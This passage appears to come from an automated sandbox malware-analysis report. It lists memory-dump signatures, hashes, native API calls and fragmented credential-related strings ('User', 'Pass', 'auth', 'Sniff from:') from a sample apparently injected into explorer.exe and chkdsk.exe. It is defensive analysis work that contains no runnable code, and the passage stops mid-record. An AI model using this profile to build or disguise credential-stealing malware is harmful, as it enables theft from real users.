                                              • Instruction ID: 2ae1993750589bd0678f352308972f77c7a391a83192d25459054c3fcc15fe15
                                              • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                              • Instruction Fuzzy Hash: 67C1A375618A19CFC758EF68E45AAAAB3E1FB98304F95432DA44EC7250DF30EA01C7C5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769593983.0000000010770000.00000040.00000001.00040000.00000000.sdmp, Offset: 10770000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10770000_explorer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: UR$2$L: $Pass$User$name$word
                                              • API String ID: 0-2058692283
                                              • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                              • Instruction ID: a539b19efc9262fd255ad6cc63975c4cee38fb6b1e05e00f395aa1e54b2721fd
                                              • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                              • Instruction Fuzzy Hash: 01A17C70618648CFDB19EFA8A445BEEB7E1FF98300F40462EE48AD7251EB709945C789
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769593983.0000000010770000.00000040.00000001.00040000.00000000.sdmp, Offset: 10770000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10770000_explorer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: UR$2$L: $Pass$User$name$word
                                              • API String ID: 0-2058692283
                                              • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                              • Instruction ID: 6f7dc321fc61f430e01198f5c4424642f773ffc99817383ab052209987cb0035
                                              • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                              • Instruction Fuzzy Hash: 57917D70618748CFDB18EFA8A444BEEB7E1FF98300F40462EE48AD7251EB709945C789
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769593983.0000000010770000.00000040.00000001.00040000.00000000.sdmp, Offset: 10770000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10770000_explorer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $.$e$n$v
                                              • API String ID: 0-1849617553
                                              • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                              • Instruction ID: 3e5ce496a8641b9d7b45dcadf833b2a5c6b814a108db2be59f57a7c64fc3f34a
                                              • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                              • Instruction Fuzzy Hash: B1718135618B49CFD758EF68D4897AAB7F1FF98304F00062EE44AC7221EB71A945CB85
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769593983.0000000010770000.00000040.00000001.00040000.00000000.sdmp, Offset: 10770000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10770000_explorer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 2.dl$dll$l32.$ole3$shel
                                              • API String ID: 0-1970020201
                                              • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                              • Instruction ID: 6182706cb3b4bd6f3c810dc6ee1bb3920ab1519e4db97f92083eb0ed675afcab
                                              • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                              • Instruction Fuzzy Hash: CF513DB0918B4CCBDB64DF64D0456EEB7F1FF58300F40462EA99AE7214EF70A5518B89
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769593983.0000000010770000.00000040.00000001.00040000.00000000.sdmp, Offset: 10770000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10770000_explorer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4$\$dll$ion.$vers
                                              • API String ID: 0-1610437797
                                              • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                              • Instruction ID: 81b82f363d11619b3776ebb45fa30097bee263a887338f4d07b2ca290f539395
                                              • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                              • Instruction Fuzzy Hash: 87416334218B48CFCBA5DF2898457EAB3E4FB99305F51462E999EC7240EF30E555C782
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769593983.0000000010770000.00000040.00000001.00040000.00000000.sdmp, Offset: 10770000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10770000_explorer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 32.d$cli.$dll$sspi$user
                                              • API String ID: 0-327345718
                                              • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                              • Instruction ID: bb37b06fe7b46960ce42bf5318a12552f4df3cd062922e613d7ff9adb29d01e2
                                              • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                              • Instruction Fuzzy Hash: 1F417E31A18E0DCFCB84EF6890997AD73E1FB58300F55466AA80ED7201DA31E990CB86
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769593983.0000000010770000.00000040.00000001.00040000.00000000.sdmp, Offset: 10770000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10770000_explorer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: .dll$el32$h$kern
                                              • API String ID: 0-4264704552
                                              • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                              • Instruction ID: c44380200d6b730a13ebbec20c346e943b3d64858ae86d6401c9b05a0b677196
                                              • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                              • Instruction Fuzzy Hash: 77419274A08B898FD7A9CF28D0893AAB7E1FB98340F144B2E949EC3255DF70D955CB41
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769593983.0000000010770000.00000040.00000001.00040000.00000000.sdmp, Offset: 10770000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10770000_explorer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $Snif$f fr$om:
                                              • API String ID: 0-3434893486
                                              • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                              • Instruction ID: a406f09459e3f18fcb90ccfd841fd60368a13ca40ac7819b506a8e20211d269d
                                              • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                              • Instruction Fuzzy Hash: 2F31E37550CB8CAFD71ADB28D4896EAB7D0FB94300F50491EE49BC7251EE30A54ACB43
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769593983.0000000010770000.00000040.00000001.00040000.00000000.sdmp, Offset: 10770000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10770000_explorer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $Snif$f fr$om:
                                              • API String ID: 0-3434893486
                                              • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                              • Instruction ID: 8097228771b94fc8d53a01bb1fc729077e86ec4b61a54d098d7fb6505754e7a9
                                              • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                              • Instruction Fuzzy Hash: 0131EF71508B4CAFD75ADB28D489AEAB7D4FB94300F50491EE49BC3251EE30E50ACB83
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769593983.0000000010770000.00000040.00000001.00040000.00000000.sdmp, Offset: 10770000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10770000_explorer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: .dll$chro$hild$me_c
                                              • API String ID: 0-3136806129
                                              • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                              • Instruction ID: 9cfcaf8a604be3a33e5437f780855f5db631252b017448ddaf7297e27df0acae
                                              • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                              • Instruction Fuzzy Hash: 91318374118B48CFCB84EF689499BAA77E1FF98300F84462DA44EC7255DF30D945C792
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769593983.0000000010770000.00000040.00000001.00040000.00000000.sdmp, Offset: 10770000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10770000_explorer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: .dll$chro$hild$me_c
                                              • API String ID: 0-3136806129
                                              • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                              • Instruction ID: 69541336ef534387bb372fd024798cadd7298a0eef573717695ada428d25d363
                                              • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                              • Instruction Fuzzy Hash: CF31A074118B48CFCB84DF68A499BAAB7E1FF98300F84462DA44ECB255DF30D945C792
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769593983.0000000010770000.00000040.00000001.00040000.00000000.sdmp, Offset: 10770000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10770000_explorer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                              • API String ID: 0-319646191
                                              • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                              • Instruction ID: 455c5799d4438bf3a7810da43425fa957fd680bf316ab4a1b85b334a5a98954e
                                              • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                              • Instruction Fuzzy Hash: D731E131614A0D8FCB45EFA8D8897EEB7E0FF58204F44422AE44ED7240EF789645C78A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769593983.0000000010770000.00000040.00000001.00040000.00000000.sdmp, Offset: 10770000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10770000_explorer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                              • API String ID: 0-319646191
                                              • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                              • Instruction ID: 047740014b70b4189b92faba2cc76177b3f55244b710fa3510a065e2edc11a7c
                                              • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                              • Instruction Fuzzy Hash: 0A21E430610A4DCBCB45EFA8D8897EEBBE1FF58304F44422AE45AD7240EF749645C78A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769593983.0000000010770000.00000040.00000001.00040000.00000000.sdmp, Offset: 10770000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10770000_explorer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: .$l$l$t
                                              • API String ID: 0-168566397
                                              • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                              • Instruction ID: f97a5d2bfaf4bd99278dececa20417ee941b274e5424111c000ec73d8abac391
                                              • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                              • Instruction Fuzzy Hash: F3215C74A24A0EDBDB44EFA8D0497AEBAF1FB58304F50462EE049D3610DB74A591CB84
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769593983.0000000010770000.00000040.00000001.00040000.00000000.sdmp, Offset: 10770000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10770000_explorer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: .$l$l$t
                                              • API String ID: 0-168566397
                                              • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                              • Instruction ID: b2167d02c72229857deda85b5e1bf2ada402a7bdd857cdd1e13ac830b52bab3a
                                              • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                              • Instruction Fuzzy Hash: 8F216D74A24A0DDBDB44EFA8D0497EDBBF1FB18304F50462EE049D3600DB74A551CB84
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769593983.0000000010770000.00000040.00000001.00040000.00000000.sdmp, Offset: 10770000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10770000_explorer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: auth$logi$pass$user
                                              • API String ID: 0-2393853802
                                              • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                              • Instruction ID: 1a848928a131073bdd4a3a9eed04681cedabb1ca509e9af28b552dd923e0f54a
                                              • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                              • Instruction Fuzzy Hash: 6921CA70624B0D8BCB45DF9998817EEB7E1FF88344F00461AE40AEB244DBB0E9548BC2

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 285 a4a3b2-a4a3b7 286 a4a366-a4a3b1 call a4af60 NtCreateFile 285->286 287 a4a3b9-a4a409 call a4af60 285->287
                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,00A44BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00A44BB7,007A002E,00000000,00000060,00000000,00000000), ref: 00A4A3AD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_a30000_chkdsk.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID: .z`
                                              • API String ID: 823142352-1441809116
                                              • Opcode ID: 565a6b0ef4778d582e62c8045aed2f18aedf3573fc556492a853cd80a750181b
                                              • Instruction ID: 7b154a1b876a7db79ffee89a12f9b16f3237941fca0e4753857ac3c665acdef6
                                              • Opcode Fuzzy Hash: 565a6b0ef4778d582e62c8045aed2f18aedf3573fc556492a853cd80a750181b
                                              • Instruction Fuzzy Hash: 1121E2B6240109AFCB08DF98DC84DEB77ADFF8C754B158248FA1D97201C630E855CBA0

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 303 a4a35d-a4a3b1 call a4af60 NtCreateFile
                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,00A44BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00A44BB7,007A002E,00000000,00000060,00000000,00000000), ref: 00A4A3AD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_a30000_chkdsk.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID: .z`
                                              • API String ID: 823142352-1441809116
                                              • Opcode ID: c445fb561ab91314719dc251cdeb34a76e2be0e382719939ef42fcf1e2460914
                                              • Instruction ID: df6819fe9276d107e7b0fbed5f0fb8cca0e7a9c80dc26aa4553a9a672784702d
                                              • Opcode Fuzzy Hash: c445fb561ab91314719dc251cdeb34a76e2be0e382719939ef42fcf1e2460914
                                              • Instruction Fuzzy Hash: 4FF0BDB2251108AFDB08CF88DC85EEB77A9EF8C754F158248FA4DA7240C630E811CBA4

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 307 a4a360-a4a3b1 call a4af60 NtCreateFile
                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,00A44BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00A44BB7,007A002E,00000000,00000060,00000000,00000000), ref: 00A4A3AD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_a30000_chkdsk.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID: .z`
                                              • API String ID: 823142352-1441809116
                                              • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                              • Instruction ID: 61906271cd78c3f9f7de519d10aa0717af159d57d6b2ec2867593707bd3a4740
                                              • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                              • Instruction Fuzzy Hash: 30F0BDB2200208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                              APIs
                                              • NtClose.NTDLL(00A44D50,?,?,00A44D50,00000000,FFFFFFFF), ref: 00A4A4B5
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_a30000_chkdsk.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: d61d7882d47260e954567d89cda33db2786c25525619cf6a11e75bef9d282398
                                              • Instruction ID: 90c18ac2eedaa12d6c1fddefbbb09bffd90f43e3d50ca6ffc9b2d69120d46fd1
                                              • Opcode Fuzzy Hash: d61d7882d47260e954567d89cda33db2786c25525619cf6a11e75bef9d282398
                                              • Instruction Fuzzy Hash: 42F05EB6204118ABD720EF98DC80EEB776DEFC8710F148559FA4C9B201D630E9148BA0
                                              APIs
                                              • NtReadFile.NTDLL(00A44D72,5EB65239,FFFFFFFF,00A44A31,?,?,00A44D72,?,00A44A31,FFFFFFFF,5EB65239,00A44D72,?,00000000), ref: 00A4A455
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_a30000_chkdsk.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: a5f4d247fe7da4d1c0ec979a60ff169e6eed6579fb626ef634e05adb666aeb9c
                                              • Instruction ID: d58f41f8e14f58116c819c388b10c39a3a18377f38763838624adc4d9d4e346b
                                              • Opcode Fuzzy Hash: a5f4d247fe7da4d1c0ec979a60ff169e6eed6579fb626ef634e05adb666aeb9c
                                              • Instruction Fuzzy Hash: 55F0F9B6200208AFCB14CF99CC81DEB77B9EF8C714F158249BE1DA7281C630E815CBA0
                                              APIs
                                              • NtReadFile.NTDLL(00A44D72,5EB65239,FFFFFFFF,00A44A31,?,?,00A44D72,?,00A44A31,FFFFFFFF,5EB65239,00A44D72,?,00000000), ref: 00A4A455
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_a30000_chkdsk.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                              • Instruction ID: 5cc5c6e671d0a07aecb77e673bdbb7717add08483fd3a4d6d15df3936272ce5d
                                              • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                              • Instruction Fuzzy Hash: ECF0B7B6200208AFDB14DF89DC81EEB77ADEF8C754F158248BE1D97241D630E811CBA0
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00A32D11,00002000,00003000,00000004), ref: 00A4A579
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_a30000_chkdsk.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: 5938a9bfef522bff7d56a3bda5061d09c2327d9b429885ba53afd9e8d1b04ae1
                                              • Instruction ID: 4362750a67f135cde869c75221a89ec733bf5727eaf2d8d787bdb6d4434cd180
                                              • Opcode Fuzzy Hash: 5938a9bfef522bff7d56a3bda5061d09c2327d9b429885ba53afd9e8d1b04ae1
                                              • Instruction Fuzzy Hash: 5CF0F8B5200108AFDB14DF99CC80EEB77A9EF98654F118259BE0DD7251D631E811CBA4
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00A32D11,00002000,00003000,00000004), ref: 00A4A579
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_a30000_chkdsk.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                              • Instruction ID: 263888f3ef0acad69b64207b40636b2f4164e9466a88f617f0fd87c247ac937e
                                              • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                              • Instruction Fuzzy Hash: D1F015B6200208ABDB14DF89CC81EAB77ADEF88754F118148BE0897241C630F811CBA0
                                              APIs
                                              • NtClose.NTDLL(00A44D50,?,?,00A44D50,00000000,FFFFFFFF), ref: 00A4A4B5
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_a30000_chkdsk.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                              • Instruction ID: f87a39868f1b3f2a9fa49b9f67ff6dab513af6cf5d551aebc8480ad351901efc
                                              • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                              • Instruction Fuzzy Hash: 40D012752402146BD710EB98CC45E97775CEF44750F154459BA1C5B242C530F50086E0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3751618566.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                                              • Associated: 00000015.00000002.3751618566.0000000005579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.000000000557D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.00000000055EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_5450000_chkdsk.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: eb64eb29e762cba31970747dff4f24e99d99357510229563cebe11159d221104
                                              • Instruction ID: 2d311b2bf2850480b83e2349480a0b637afc780da651d969220d78814ec06c8b
                                              • Opcode Fuzzy Hash: eb64eb29e762cba31970747dff4f24e99d99357510229563cebe11159d221104
                                              • Instruction Fuzzy Hash: 8D90022E21341002D1807158545865A402587E1202FD5D416A0015568CCA1989695331
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3751618566.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                                              • Associated: 00000015.00000002.3751618566.0000000005579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.000000000557D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.00000000055EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_5450000_chkdsk.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: f980ab82fe22ada3a0cea4bdfa53e0deddd0b5c985dc9dbaecf35b6d3c419c25
                                              • Instruction ID: 4e6c9bf66f9a7f8e4267164b74d65f5ef99e46533eea441ad275c4ae2804ef1a
                                              • Opcode Fuzzy Hash: f980ab82fe22ada3a0cea4bdfa53e0deddd0b5c985dc9dbaecf35b6d3c419c25
                                              • Instruction Fuzzy Hash: E7900226242451525545B1584454557802697F02417D5C013A1414960C862A9956D631
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3751618566.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                                              • Associated: 00000015.00000002.3751618566.0000000005579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.000000000557D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.00000000055EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_5450000_chkdsk.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 3c233c92f278111654590db98a42483973b29013409fd03805b7b598e25810ff
                                              • Instruction ID: c3c069a91ddd3855e4a4b41bae4cc098ec619f30d6ecf130ee2d748f95ec1d34
                                              • Opcode Fuzzy Hash: 3c233c92f278111654590db98a42483973b29013409fd03805b7b598e25810ff
                                              • Instruction Fuzzy Hash: 6B90023620141413D11171584554757402987E0241FD5C413A0424568D975A8A52A131
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3751618566.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                                              • Associated: 00000015.00000002.3751618566.0000000005579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.000000000557D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.00000000055EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_5450000_chkdsk.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: ef68d7c2411e444d6eed8aa823a0c6eec7ac37b1e13f263999cef7cc81c7d8c1
                                              • Instruction ID: d2f403dbdf8ca4821937b49904ab1c33510a9524b4100799d8665b0248c2a66b
                                              • Opcode Fuzzy Hash: ef68d7c2411e444d6eed8aa823a0c6eec7ac37b1e13f263999cef7cc81c7d8c1
                                              • Instruction Fuzzy Hash: 2990023620141842D10071584454B96402587F0301F95C017A0124664D8719C9517531
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3751618566.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                                              • Associated: 00000015.00000002.3751618566.0000000005579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.000000000557D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.00000000055EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_5450000_chkdsk.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 6198f02d75463162c5a2cd7bae4c27c8ebceda57a7f44da9f115a9e51e209e4f
                                              • Instruction ID: 1babdb98c8b13c6dba7d82a579201216fe9999cc7aa44b39c139d903016c5ec2
                                              • Opcode Fuzzy Hash: 6198f02d75463162c5a2cd7bae4c27c8ebceda57a7f44da9f115a9e51e209e4f
                                              • Instruction Fuzzy Hash: 7390023620149802D1107158845479A402587E0301F99C412A4424668D879989917131
                                              APIs
                                              Memory Dump Source
